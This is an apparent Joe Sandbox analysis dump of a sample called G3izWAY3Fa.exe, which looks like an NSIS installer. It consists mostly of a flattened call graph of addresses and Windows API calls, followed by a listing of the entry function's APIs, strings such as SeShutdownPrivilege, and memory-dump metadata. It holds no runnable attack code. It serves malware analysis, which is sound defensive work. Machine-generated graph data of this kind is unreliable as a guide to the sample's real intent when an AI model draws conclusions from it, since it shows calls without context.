3749->3750 3751 402172 3752 4029f6 18 API calls 3751->3752 3753 402178 3752->3753 3754 4029f6 18 API calls 3753->3754 3755 402181 3754->3755 3756 4029f6 18 API calls 3755->3756 3757 40218a 3756->3757 3758 405cd8 2 API calls 3757->3758 3759 402193 3758->3759 3760 4021a4 lstrlenA lstrlenA 3759->3760 3761 402197 3759->3761 3763 404d7b 25 API calls 3760->3763 3762 404d7b 25 API calls 3761->3762 3765 40219f 3761->3765 3762->3765 3764 4021e0 SHFileOperationA 3763->3764 3764->3761 3764->3765 3766 4021f4 3767 40220e 3766->3767 3768 4021fb 3766->3768 3769 4059ff 18 API calls 3768->3769 3770 402208 3769->3770 3771 40529e MessageBoxIndirectA 3770->3771 3771->3767 3779 4016fa 3780 4029f6 18 API calls 3779->3780 3781 401701 SearchPathA 3780->3781 3782 40171c 3781->3782 3783 4025fb 3784 402602 3783->3784 3785 40288b 3783->3785 3786 402608 FindClose 3784->3786 3786->3785 3787 40267c 3788 4029f6 18 API calls 3787->3788 3790 40268a 3788->3790 3789 4026a0 3792 405695 2 API calls 3789->3792 3790->3789 3791 4029f6 18 API calls 3790->3791 3791->3789 3793 4026a6 3792->3793 3813 4056b4 GetFileAttributesA CreateFileA 3793->3813 3795 4026b3 3796 40275c 3795->3796 3797 4026bf GlobalAlloc 3795->3797 3800 402764 DeleteFileA 3796->3800 3801 402777 3796->3801 3798 402753 CloseHandle 3797->3798 3799 4026d8 3797->3799 3798->3796 3814 403080 SetFilePointer 3799->3814 3800->3801 3803 4026de 3804 40304e ReadFile 3803->3804 3805 4026e7 GlobalAlloc 3804->3805 3806 4026f7 3805->3806 3807 40272b WriteFile GlobalFree 3805->3807 3808 402e5b 37 API calls 3806->3808 3809 402e5b 37 API calls 3807->3809 3812 402704 3808->3812 3810 402750 3809->3810 3810->3798 3811 402722 GlobalFree 3811->3807 3812->3811 3813->3795 3814->3803 3815 4014fe 3816 401506 3815->3816 3817 401519 3815->3817 3818 4029d9 18 API calls 3816->3818 3818->3817 3819 401000 3820 401037 BeginPaint GetClientRect 3819->3820 3821 40100c DefWindowProcA 3819->3821 3822 4010f3 3820->3822 3824 401179 3821->3824 3825 401073 CreateBrushIndirect FillRect DeleteObject 3822->3825 3826 4010fc 3822->3826 3825->3822 3827 401102 CreateFontIndirectA 3826->3827 3828 401167 EndPaint 3826->3828 3827->3828 3829 401112 6 API calls 3827->3829 3828->3824 3829->3828 3830 404502 3831 404512 3830->3831 3832 40452e 3830->3832 3841 405282 GetDlgItemTextA 3831->3841 3834 404561 3832->3834 3835 404534 SHGetPathFromIDListA 3832->3835 3837 40454b SendMessageA 3835->3837 3838 404544 3835->3838 3836 40451f SendMessageA 3836->3832 3837->3834 3839 40140b 2 API calls 3838->3839 3839->3837 3841->3836 3842 402303 3843 402309 3842->3843 3844 4029f6 18 API calls 3843->3844 3845 40231b 3844->3845 3846 4029f6 18 API calls 3845->3846 3847 402325 RegCreateKeyExA 3846->3847 3848 40234f 3847->3848 3849 40288b 3847->3849 3850 402367 3848->3850 3851 4029f6 18 API calls 3848->3851 3852 402373 3850->3852 3855 4029d9 18 API calls 3850->3855 3854 402360 lstrlenA 3851->3854 3853 40238e RegSetValueExA 3852->3853 3856 402e5b 37 API calls 3852->3856 3857 4023a4 RegCloseKey 3853->3857 3854->3850 3855->3852 3856->3853 3857->3849 3859 402803 3860 4029d9 18 API calls 3859->3860 3861 402809 3860->3861 3862 402817 3861->3862 3863 40283a 3861->3863 3864 40265c 3861->3864 3862->3864 3867 40593b wsprintfA 3862->3867 3863->3864 3865 4059ff 18 API calls 3863->3865 3865->3864 3867->3864 3868 401b06 3869 401b13 3868->3869 3870 401b57 3868->3870 3873 4021fb 3869->3873 3878 401b2a 3869->3878 3871 401b80 GlobalAlloc 3870->3871 3872 401b5b 3870->3872 3874 4059ff 18 API calls 3871->3874 3886 401b9b 3872->3886 3889 4059dd lstrcpynA 3872->3889 3875 4059ff 18 API calls 3873->3875 3874->3886 3877 402208 3875->3877 3882 40529e MessageBoxIndirectA 3877->3882 3887 4059dd lstrcpynA 3878->3887 3879 401b6d GlobalFree 3879->3886 3881 401b39 3888 4059dd lstrcpynA 3881->3888 3882->3886 3884 401b48 3890 4059dd lstrcpynA 3884->3890 3887->3881 3888->3884 3889->3879 3890->3886 3891 402506 3892 4029d9 18 API calls 3891->3892 3894 402510 3892->3894 3893 402586 3894->3893 3895 402544 ReadFile 3894->3895 3896 402588 3894->3896 3898 402598 3894->3898 3895->3893 3895->3894 3900 40593b wsprintfA 3896->3900 3898->3893 3899 4025ae SetFilePointer 3898->3899 3899->3893 3900->3893 3901 404186 3902 404196 3901->3902 3903 4041bc 3901->3903 3904 403d8f 19 API calls 3902->3904 3905 403df6 8 API calls 3903->3905 3906 4041a3 SetDlgItemTextA 3904->3906 3907 4041c8 3905->3907 3906->3903 3061 401389 3063 401390 3061->3063 3062 4013fe 3063->3062 3064 4013cb MulDiv SendMessageA 3063->3064 3064->3063 3908 401c8a 3909 4029d9 18 API calls 3908->3909 3910 401c91 3909->3910 3911 4029d9 18 API calls 3910->3911 3912 401c99 GetDlgItem 3911->3912 3913 4024b8 3912->3913 3927 401490 3928 404d7b 25 API calls 3927->3928 3929 401497 3928->3929 3930 402615 3931 402618 3930->3931 3932 402630 3930->3932 3933 402625 FindNextFileA 3931->3933 3933->3932 3934 40266f 3933->3934 3936 4059dd lstrcpynA 3934->3936 3936->3932 3937 401595 3938 4029f6 18 API calls 3937->3938 3939 40159c SetFileAttributesA 3938->3939 3940 4015ae 3939->3940 3941 401d95 3942 4029d9 18 API calls 3941->3942 3943 401d9b 3942->3943 3944 4029d9 18 API calls 3943->3944 3945 401da4 3944->3945 3946 401db6 EnableWindow 3945->3946 3947 401dab ShowWindow 3945->3947 3948 40288b 3946->3948 3947->3948 3949 401e95 3950 4029f6 18 API calls 3949->3950 3951 401e9c 3950->3951 3952 405cd8 2 API calls 3951->3952 3953 401ea2 3952->3953 3955 401eb4 3953->3955 3956 40593b wsprintfA 3953->3956 3956->3955 3957 401696 3958 4029f6 18 API calls 3957->3958 3959 40169c GetFullPathNameA 3958->3959 3960 4016b3 3959->3960 3966 4016d4 3959->3966 3963 405cd8 2 API calls 3960->3963 3960->3966 3961 4016e8 GetShortPathNameA 3962 40288b 3961->3962 3964 4016c4 3963->3964 3964->3966 3967 4059dd lstrcpynA 3964->3967 3966->3961 3966->3962 3967->3966 3968 401d1b GetDC GetDeviceCaps 3969 4029d9 18 API calls 3968->3969 3970 401d37 MulDiv 3969->3970 3971 4029d9 18 API calls 3970->3971 3972 401d4c 3971->3972 3973 4059ff 18 API calls 3972->3973 3974 401d85 CreateFontIndirectA 3973->3974 3975 4024b8 3974->3975 3976 401e1b 3977 4029f6 18 API calls 3976->3977 3978 401e21 3977->3978 3979 404d7b 25 API calls 3978->3979 3980 401e2b 3979->3980 3981 40523d 2 API calls 3980->3981 3982 401e31 3981->3982 3983 401e87 CloseHandle 3982->3983 3984 40265c 3982->3984 3985 401e50 WaitForSingleObject 3982->3985 3989 405d38 2 API calls 3982->3989 3983->3984 3985->3982 3986 401e5e GetExitCodeProcess 3985->3986 3987 401e70 3986->3987 3988 401e79 3986->3988 3991 40593b wsprintfA 3987->3991 3988->3983 3989->3985 3991->3988 3999 40249c 4000 4029f6 18 API calls 3999->4000 4001 4024a3 4000->4001 4004 4056b4 GetFileAttributesA CreateFileA 4001->4004 4003 4024af 4004->4003 4005 402020 4006 4029f6 18 API calls 4005->4006 4007 402027 4006->4007 4008 4029f6 18 API calls 4007->4008 4009 402031 4008->4009 4010 4029f6 18 API calls 4009->4010 4011 40203a 4010->4011 4012 4029f6 18 API calls 4011->4012 4013 402044 4012->4013 4014 4029f6 18 API calls 4013->4014 4015 40204e 4014->4015 4016 402062 CoCreateInstance 4015->4016 4017 4029f6 18 API calls 4015->4017 4020 402081 4016->4020 4021 402137 4016->4021 4017->4016 4018 401423 25 API calls 4019 402169 4018->4019 4020->4021 4022 402116 MultiByteToWideChar 4020->4022 4021->4018 4021->4019 4022->4021 4023 401721 4024 4029f6 18 API calls 4023->4024 4025 401728 4024->4025 4026 4056e3 2 API calls 4025->4026 4027 40172f 4026->4027 4027->4027 4028 401922 4029 4029f6 18 API calls 4028->4029 4030 401929 lstrlenA 4029->4030 4031 4024b8 4030->4031 4032 402223 4033 40222b 4032->4033 4036 402231 4032->4036 4034 4029f6 18 API calls 4033->4034 4034->4036 4035 402241 4038 40224f 4035->4038 4039 4029f6 18 API calls 4035->4039 4036->4035 4037 4029f6 18 API calls 4036->4037 4037->4035 4040 4029f6 18 API calls 4038->4040 4039->4038 4041 402258 WritePrivateProfileStringA 4040->4041 4042 403ea3 lstrcpynA lstrlenA 4043 401ca5 4044 4029d9 18 API calls 4043->4044 4045 401cb5 SetWindowLongA 4044->4045 4046 40288b 4045->4046 4047 401a26 4048 4029d9 18 API calls 4047->4048 4049 401a2c 4048->4049 4050 4029d9 18 API calls 4049->4050 4051 4019d6 4050->4051 4052 402427 4062 402b00 4052->4062 4054 402431 4055 4029d9 18 API calls 4054->4055 4056 40243a 4055->4056 4057 402451 RegEnumKeyA 4056->4057 4058 40245d RegEnumValueA 4056->4058 4060 40265c 4056->4060 4059 402476 RegCloseKey 4057->4059 4058->4059 4058->4060 4059->4060 4063 4029f6 18 API calls 4062->4063 4064 402b19 4063->4064 4065 402b27 RegOpenKeyExA 4064->4065 4065->4054 4066 4022a7 4067 4022d7 4066->4067 4068 4022ac 4066->4068 4069 4029f6 18 API calls 4067->4069 4070 402b00 19 API calls 4068->4070 4072 4022de 4069->4072 4071 4022b3 4070->4071 4073 4029f6 18 API calls 4071->4073 4076 4022f4 4071->4076 4077 402a36 RegOpenKeyExA 4072->4077 4074 4022c4 RegDeleteValueA RegCloseKey 4073->4074 4074->4076 4084 402aad 4077->4084 4085 402a61 4077->4085 4078 402a87 RegEnumKeyA 4079 402a99 RegCloseKey 4078->4079 4078->4085 4081 405cff 3 API calls 4079->4081 4080 402abe RegCloseKey 4080->4084 4083 402aa9 4081->4083 4082 402a36 3 API calls 4082->4085 4083->4084 4086 402ad9 RegDeleteKeyA 4083->4086 4084->4076 4085->4078 4085->4079 4085->4080 4085->4082 4086->4084 4087 405fa8 4089 405e2c 4087->4089 4088 406797 4089->4088 4090 405eb6 GlobalAlloc 4089->4090 4091 405ead GlobalFree 4089->4091 4092 405f24 GlobalFree 4089->4092 4093 405f2d GlobalAlloc 4089->4093 4090->4088 4090->4089 4091->4090 4092->4093 4093->4088 4093->4089 4094 401bad 4095 4029d9 18 API calls 4094->4095 4096 401bb4 4095->4096 4097 4029d9 18 API calls 4096->4097 4098 401bbe 4097->4098 4099 401bce 4098->4099 4100 4029f6 18 API calls 4098->4100 4101 401bde 4099->4101 4102 4029f6 18 API calls 4099->4102 4100->4099 4103 401be9 4101->4103 4104 401c2d 4101->4104 4102->4101 4105 4029d9 18 API calls 4103->4105 4106 4029f6 18 API calls 4104->4106 4108 401bee 4105->4108 4107 401c32 4106->4107 4109 4029f6 18 API calls 4107->4109 4110 4029d9 18 API calls 4108->4110 4111 401c3b FindWindowExA 4109->4111 4112 401bf7 4110->4112 4115 401c59 4111->4115 4113 401c1d SendMessageA 4112->4113 4114 401bff SendMessageTimeoutA 4112->4114 4113->4115 4114->4115 4116 4023af 4117 402b00 19 API calls 4116->4117 4118 4023b9 4117->4118 4119 4029f6 18 API calls 4118->4119 4120 4023c2 4119->4120 4121 4023cc RegQueryValueExA 4120->4121 4125 40265c 4120->4125 4122 4023f2 RegCloseKey 4121->4122 4123 4023ec 4121->4123 4122->4125 4123->4122 4127 40593b wsprintfA 4123->4127 4127->4122 2949 4015b3 2950 4029f6 18 API calls 2949->2950 2951 4015ba 2950->2951 2967 405564 CharNextA CharNextA 2951->2967 2953 40160a 2955 40162d 2953->2955 2956 40160f 2953->2956 2954 4054fb CharNextA 2957 4015d0 CreateDirectoryA 2954->2957 2960 401423 25 API calls 2955->2960 2958 401423 25 API calls 2956->2958 2959 4015e5 GetLastError 2957->2959 2964 4015c2 2957->2964 2961 401616 2958->2961 2963 4015f2 GetFileAttributesA 2959->2963 2959->2964 2966 402169 2960->2966 2973 4059dd lstrcpynA 2961->2973 2963->2964 2964->2953 2964->2954 2965 401621 SetCurrentDirectoryA 2965->2966 2968 40557e 2967->2968 2972 40558a 2967->2972 2969 405585 CharNextA 2968->2969 2968->2972 2970 4055a7 2969->2970 2970->2964 2971 4054fb CharNextA 2971->2972 2972->2970 2972->2971 2973->2965 2974 401734 2975 4029f6 18 API calls 2974->2975 2976 40173b 2975->2976 2977 401761 2976->2977 2978 401759 2976->2978 3040 4059dd lstrcpynA 2977->3040 3039 4059dd lstrcpynA 2978->3039 2981 40175f 2985 405c3f 5 API calls 2981->2985 2982 40176c 3041 4054d0 lstrlenA CharPrevA 2982->3041 2998 40177e 2985->2998 2986 401789 2990 401795 CompareFileTime 2986->2990 2986->2998 3044 405cd8 FindFirstFileA 2986->3044 2990->2986 2991 401859 2992 404d7b 25 API calls 2991->2992 2993 401863 2992->2993 3017 402e5b 2993->3017 2994 404d7b 25 API calls 2997 401845 2994->2997 2995 4059dd lstrcpynA 2995->2998 2998->2986 2998->2991 2998->2995 3001 4059ff 18 API calls 2998->3001 3011 401830 2998->3011 3013 405695 GetFileAttributesA 2998->3013 3016 4056b4 GetFileAttributesA CreateFileA 2998->3016 3047 40529e 2998->3047 3000 40188a SetFileTime 3002 40189c CloseHandle 3000->3002 3001->2998 3002->2997 3003 4018ad 3002->3003 3004 4018b2 3003->3004 3005 4018c5 3003->3005 3006 4059ff 18 API calls 3004->3006 3007 4059ff 18 API calls 3005->3007 3009 4018ba lstrcatA 3006->3009 3010 4018cd 3007->3010 3009->3010 3012 40529e MessageBoxIndirectA 3010->3012 3011->2994 3011->2997 3012->2997 3014 4056b1 3013->3014 3015 4056a4 SetFileAttributesA 3013->3015 3014->2998 3015->3014 3016->2998 3019 402e71 3017->3019 3018 402e9c 3051 40304e ReadFile 3018->3051 3019->3018 3060 403080 SetFilePointer 3019->3060 3023 402fe2 3025 402fe6 3023->3025 3030 402ffe 3023->3030 3024 402eb9 GetTickCount 3035 402ecc 3024->3035 3027 40304e ReadFile 3025->3027 3026 401876 3026->3000 3026->3002 3027->3026 3028 40304e ReadFile 3028->3030 3029 40304e ReadFile 3029->3035 3030->3026 3030->3028 3031 403019 WriteFile 3030->3031 3031->3026 3032 40302e 3031->3032 3032->3026 3032->3030 3034 402f32 GetTickCount 3034->3035 3035->3026 3035->3029 3035->3034 3036 402f5b MulDiv wsprintfA 3035->3036 3037 402f99 WriteFile 3035->3037 3053 405df9 3035->3053 3038 404d7b 25 API calls 3036->3038 3037->3026 3037->3035 3038->3035 3039->2981 3040->2982 3042 401772 lstrcatA 3041->3042 3043 4054ea lstrcatA 3041->3043 3042->2981 3043->3042 3045 405cf9 3044->3045 3046 405cee FindClose 3044->3046 3045->2986 3046->3045 3048 4052b3 3047->3048 3049 4052ff 3048->3049 3050 4052c7 MessageBoxIndirectA 3048->3050 3049->2998 3050->3049 3052 402ea7 3051->3052 3052->3023 3052->3024 3052->3026 3056 405e1e 3053->3056 3059 405e26 3053->3059 3054 405eb6 GlobalAlloc 3054->3056 3054->3059 3055 405ead GlobalFree 3055->3054 3056->3035 3057 405f24 GlobalFree 3058 405f2d GlobalAlloc 3057->3058 3058->3056 3058->3059 3059->3054 3059->3055 3059->3056 3059->3057 3059->3058 3060->3018 4135 401634 4136 4029f6 18 API calls 4135->4136 4137 40163a 4136->4137 4138 405cd8 2 API calls 4137->4138 4139 401640 4138->4139 4140 401934 4141 4029d9 18 API calls 4140->4141 4142 40193b 4141->4142 4143 4029d9 18 API calls 4142->4143 4144 401945 4143->4144 4145 4029f6 18 API calls 4144->4145 4146 40194e 4145->4146 4147 401961 lstrlenA 4146->4147 4148 40199c 4146->4148 4149 40196b 4147->4149 4149->4148 4153 4059dd lstrcpynA 4149->4153 4151 401985 4151->4148 4152 401992 lstrlenA 4151->4152 4152->4148 4153->4151 4154 4019b5 4155 4029f6 18 API calls 4154->4155 4156 4019bc 4155->4156 4157 4029f6 18 API calls 4156->4157 4158 4019c5 4157->4158 4159 4019cc lstrcmpiA 4158->4159 4160 4019de lstrcmpA 4158->4160 4161 4019d2 4159->4161 4160->4161 4162 4014b7 4163 4014bd 4162->4163 4164 401389 2 API calls 4163->4164 4165 4014c5 4164->4165 4166 404eb9 4167 405065 4166->4167 4168 404eda GetDlgItem GetDlgItem GetDlgItem 4166->4168 4170 405096 4167->4170 4171 40506e GetDlgItem CreateThread CloseHandle 4167->4171 4212 403dc4 SendMessageA 4168->4212 4173 4050c1 4170->4173 4174 4050e3 4170->4174 4175 4050ad ShowWindow ShowWindow 4170->4175 4171->4170 4172 404f4b 4177 404f52 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4172->4177 4176 40511f 4173->4176 4179 4050d2 4173->4179 4180 4050f8 ShowWindow 4173->4180 4181 403df6 8 API calls 4174->4181 4214 403dc4 SendMessageA 4175->4214 4176->4174 4186 40512a SendMessageA 4176->4186 4184 404fc1 4177->4184 4185 404fa5 SendMessageA SendMessageA 4177->4185 4215 403d68 4179->4215 4182 405118 4180->4182 4183 40510a 4180->4183 4193 4050f1 4181->4193 4189 403d68 SendMessageA 4182->4189 4188 404d7b 25 API calls 4183->4188 4190 404fd4 4184->4190 4191 404fc6 SendMessageA 4184->4191 4185->4184 4192 405143 CreatePopupMenu 4186->4192 4186->4193 4188->4182 4189->4176 4195 403d8f 19 API calls 4190->4195 4191->4190 4194 4059ff 18 API calls 4192->4194 4196 405153 AppendMenuA 4194->4196 4197 404fe4 4195->4197 4198 405166 GetWindowRect 4196->4198 4199 405179 4196->4199 4200 405021 GetDlgItem SendMessageA 4197->4200 4201 404fed ShowWindow 4197->4201 4203 405182 TrackPopupMenu 4198->4203 4199->4203 4200->4193 4202 405048 SendMessageA SendMessageA 4200->4202 4204 405010 4201->4204 4205 405003 ShowWindow 4201->4205 4202->4193 4203->4193 4206 4051a0 4203->4206 4213 403dc4 SendMessageA 4204->4213 4205->4204 4207 4051bc SendMessageA 4206->4207 4207->4207 4209 4051d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4207->4209 4210 4051fb SendMessageA 4209->4210 4210->4210 4211 40521c GlobalUnlock SetClipboardData CloseClipboard 4210->4211 4211->4193 4212->4172 4213->4200 4214->4173 4216 403d75 SendMessageA 4215->4216 4217 403d6f 4215->4217 4216->4174 4217->4216 4218 402b3b 4219 402b63 4218->4219 4220 402b4a SetTimer 4218->4220 4221 402bb8 4219->4221 4222 402b7d MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4219->4222 4220->4219 4222->4221 4223 4038bc 4224 4038d4 4223->4224 4225 403a0f 4223->4225 4224->4225 4226 4038e0 4224->4226 4227 403a20 GetDlgItem GetDlgItem 4225->4227 4228 403a60 4225->4228 4229 4038eb SetWindowPos 4226->4229 4230 4038fe 4226->4230 4231 403d8f 19 API calls 4227->4231 4232 403aba 4228->4232 4237 401389 2 API calls 4228->4237 4229->4230 4234 403903 ShowWindow 4230->4234 4235 40391b 4230->4235 4236 403a4a SetClassLongA 4231->4236 4233 403ddb SendMessageA 4232->4233 4253 403a0a 4232->4253 4260 403acc 4233->4260 4234->4235 4238 403923 DestroyWindow 4235->4238 4239 40393d 4235->4239 4240 40140b 2 API calls 4236->4240 4241 403a92 4237->4241 4290 403d18 4238->4290 4242 403942 SetWindowLongA 4239->4242 4243 403953 4239->4243 4240->4228 4241->4232 4246 403a96 SendMessageA 4241->4246 4242->4253 4244 4039ca 4243->4244 4245 40395f GetDlgItem 4243->4245 4251 403df6 8 API calls 4244->4251 4249 403972 SendMessageA IsWindowEnabled 4245->4249 4250 40398f 4245->4250 4246->4253 4247 40140b 2 API calls 4247->4260 4248 403d1a DestroyWindow EndDialog 4248->4290 4249->4250 4249->4253 4255 40399c 4250->4255 4256 4039e3 SendMessageA 4250->4256 4257 4039af 4250->4257 4266 403994 4250->4266 4251->4253 4252 403d49 ShowWindow 4252->4253 4254 4059ff 18 API calls 4254->4260 4255->4256 4255->4266 4256->4244 4261 4039b7 4257->4261 4262 4039cc 4257->4262 4258 403d68 SendMessageA 4258->4244 4259 403d8f 19 API calls 4259->4260 4260->4247 4260->4248 4260->4253 4260->4254 4260->4259 4265 403d8f 19 API calls 4260->4265 4281 403c5a DestroyWindow 4260->4281 4264 40140b 2 API calls 4261->4264 4263 40140b 2 API calls 4262->4263 4263->4266 4264->4266 4267 403b47 GetDlgItem 4265->4267 4266->4244 4266->4258 4268 403b64 ShowWindow EnableWindow 4267->4268 4269 403b5c 4267->4269 4291 403db1 EnableWindow 4268->4291 4269->4268 4271 403b8e EnableWindow 4274 403ba2 4271->4274 4272 403ba7 GetSystemMenu EnableMenuItem SendMessageA 4273 403bd7 SendMessageA 4272->4273 4272->4274 4273->4274 4274->4272 4292 403dc4 SendMessageA 4274->4292 4293 4059dd lstrcpynA 4274->4293 4277 403c05 lstrlenA 4278 4059ff 18 API calls 4277->4278 4279 403c16 SetWindowTextA 4278->4279 4280 401389 2 API calls 4279->4280 4280->4260 4282 403c74 CreateDialogParamA 4281->4282 4281->4290 4283 403ca7 4282->4283 4282->4290 4284 403d8f 19 API calls 4283->4284 4285 403cb2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4284->4285 4286 401389 2 API calls 4285->4286 4287 403cf8 4286->4287 4287->4253 4288 403d00 ShowWindow 4287->4288 4289 403ddb SendMessageA 4288->4289 4289->4290 4290->4252 4290->4253 4291->4271 4292->4274 4293->4277 4294 40263e 4295 4029f6 18 API calls 4294->4295 4296 402645 FindFirstFileA 4295->4296 4297 402668 4296->4297 4301 402658 4296->4301 4298 40266f 4297->4298 4302 40593b wsprintfA 4297->4302 4303 4059dd lstrcpynA 4298->4303 4302->4298 4303->4301 4304 4024be 4305 4024c3 4304->4305 4306 4024d4 4304->4306 4307 4029d9 18 API calls 4305->4307 4308 4029f6 18 API calls 4306->4308 4310 4024ca 4307->4310 4309 4024db lstrlenA 4308->4309 4309->4310 4311 4024fa WriteFile 4310->4311 4312 40265c 4310->4312 4311->4312

                                Executed Functions

                                Function 004030CB Relevance: 70.3, APIs: 24, Strings: 16, Instructions: 270filestringcomCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 4030cb-403160 #17 SetErrorMode OleInitialize call 405cff SHGetFileInfoA call 4059dd GetCommandLineA call 4059dd GetModuleHandleA 7 403162-403167 0->7 8 40316c-403181 call 4054fb CharNextA 0->8 7->8 11 4031e6-4031ea 8->11 12 403183-403186 11->12 13 4031ec 11->13 14 403188-40318c 12->14 15 40318e-403196 12->15 16 4031ff-403217 GetTempPathA call 403097 13->16 14->14 14->15 17 403198-403199 15->17 18 40319e-4031a1 15->18 26 403239-403250 DeleteFileA call 402c22 16->26 27 403219-403237 GetWindowsDirectoryA lstrcatA call 403097 16->27 17->18 20 4031a3-4031a7 18->20 21 4031d6-4031e3 call 4054fb 18->21 24 4031b7-4031bd 20->24 25 4031a9-4031b2 20->25 21->11 38 4031e5 21->38 28 4031cd-4031d4 24->28 29 4031bf-4031c8 24->29 25->24 32 4031b4 25->32 39 4032b7-4032c6 ExitProcess CoUninitialize 26->39 40 403252-403258 26->40 27->26 27->39 28->21 36 4031ee-4031fa call 4059dd 28->36 29->28 35 4031ca 29->35 32->24 35->28 36->16 38->11 44 4033b1-4033b7 39->44 45 4032cc-4032dc call 40529e ExitProcess 39->45 42 4032a7-4032ae call 403526 40->42 43 40325a-403263 call 4054fb 40->43 52 4032b3 42->52 58 40326e-403270 43->58 46 403434-40343c 44->46 47 4033b9-4033d6 call 405cff * 3 44->47 53 403442-403446 ExitProcess 46->53 54 40343e 46->54 74 403420-40342b ExitWindowsEx 47->74 75 4033d8-4033da 47->75 52->39 54->53 60 403272-40327c 58->60 61 403265-40326b 58->61 64 4032e2-4032fc lstrcatA lstrcmpiA 60->64 65 40327e-40328b call 4055b1 60->65 61->60 63 40326d 61->63 63->58 64->39 67 4032fe-403313 CreateDirectoryA SetCurrentDirectoryA 64->67 65->39 77 40328d-4032a3 call 4059dd * 2 65->77 70 403320-40333a call 4059dd 67->70 71 403315-40331b call 4059dd 67->71 83 40333f-40335b call 4059ff DeleteFileA 70->83 71->70 74->46 80 40342d-40342f call 40140b 74->80 75->74 81 4033dc-4033de 75->81 77->42 80->46 81->74 85 4033e0-4033f2 GetCurrentProcess 81->85 91 40339c-4033a3 83->91 92 40335d-40336d CopyFileA 83->92 85->74 93 4033f4-403416 85->93 91->83 95 4033a5-4033ac call 40572b 91->95 92->91 94 40336f-40338f call 40572b call 4059ff call 40523d 92->94 93->74 94->91 105 403391-403398 CloseHandle 94->105 95->39 105->91
                                APIs
                                • #17.COMCTL32 ref: 004030EA
                                • SetErrorMode.KERNELBASE(00008001), ref: 004030F5
                                • OleInitialize.OLE32(00000000), ref: 004030FC
                                  • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                  • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                  • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                • SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124
                                  • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
                                • GetCommandLineA.KERNEL32(00423680,NSIS Error), ref: 00403139
                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040314C
                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000020), ref: 00403177
                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
                                • DeleteFileA.KERNELBASE(1033), ref: 0040323E
                                • ExitProcess.KERNEL32(00000000), ref: 004032B7
                                • CoUninitialize.COMBASE(00000000), ref: 004032BC
                                • ExitProcess.KERNEL32 ref: 004032DC
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000), ref: 004032E8
                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004032F4
                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
                                • DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\G3izWAY3Fa.exe,0041F030,00000001), ref: 00403365
                                • CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403423
                                • ExitProcess.KERNEL32 ref: 00403446
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\G3izWAY3Fa.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G3izWAY3Fa.exe$C:\Windows\temp$C:\Windows\temp$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                • API String ID: 553446912-3967748765
                                • Opcode ID: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                • Instruction ID: cc286ec977d2638fbe9c092aa5ad16f4889e12429ffafd7da1ab197300c5bae6
